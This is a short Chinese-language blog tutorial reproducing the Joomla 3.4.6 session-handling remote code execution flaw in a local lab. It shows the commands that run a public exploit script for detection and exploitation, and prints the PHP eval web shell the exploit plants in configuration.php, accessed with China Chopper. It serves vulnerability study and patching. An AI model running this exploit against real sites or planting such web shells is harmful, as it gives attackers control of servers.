Joomla 3.4.6 遠程代碼執行漏洞復現

0x00 CMS簡介

Joomla!是一套全球知名的內容管理系統。 Joomla!是使用PHP語言加上MySQL數據庫所開發的軟件系統,目前最新版本是3.9.11 。可以在Linux、 Windows、MacOSX等各種不同的平臺上執行。目前是由Open Source Matter這個開放源碼組織進行開發與支持,這個組織的成員來自全世界各地,小組成員約有150人,包含了開發者、設計者、系統管理者、文件撰寫者,以及超過2萬名的參與會員。
自2012年頒獎典禮開始以來,Joomla連續多年成爲CMS評獎的冠軍。繼2015、2016、2017、2018年在全球CMS評測中,它再次獲得“最佳開源CMS”獎!

0x01 漏洞簡介

  • Alessandro Groppo @Hacktive Security於2019-10-02在exploit-db( https://www.exploit-db.com/exploits/47465)發佈了Joomla命令執行的EXP,漏洞本質是Joomla對session數據處理不當,未經授權的攻擊者可以發送精心構造的惡意 HTTP 請求,獲取服務器權限,實現遠程命令執行。
  • 影響範圍:3.0.0 <= Joomla <= 3.4.6

0x02 環境搭建

我用的phpstudy搭建的
Joomla下載地址:https://downloads.joomla.org/it/cms/joomla3/3-4-6
安裝成功後首頁如下
在這裏插入圖片描述

0x03 漏洞復現

EXP:https://github.com/kiks7/rusty_joomla_rce
1.漏洞檢測

python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -c

運行結果如下,Vulnerable證明存在漏洞
在這裏插入圖片描述
2.漏洞利用

rusty_joomla_rce-master>python rusty_joomla_exploit.py -t http://quan.joomla346.net/ -e -l quan.joomla346.net -p 80

在這裏插入圖片描述
可以看到configuration.php中寫入了一句話木馬(這裏我多運行了幾次,於是有好幾個)
在這裏插入圖片描述

if(isset($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg'])) eval($_POST['epgijbodvzllittceoyidpbbglcdawduhyvqqtdndfxjfivvkg']);if(isset($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm'])) eval($_POST['bhjhofjrtfrlskgaufapblryaqymfzrrbaoluyljwgekkoakhm']);if(isset($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj'])) eval($_POST['dzyxxxhejymxvidysrisgguzvbehpuudwgkwcgldarnnlkxgbj']);

用菜刀連接
在這裏插入圖片描述

0x04 漏洞修復

更新至官網最新版本

0x05 參考

https://mp.weixin.qq.com/s/1LJJG-whv1vUfaWDSfA2gg

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章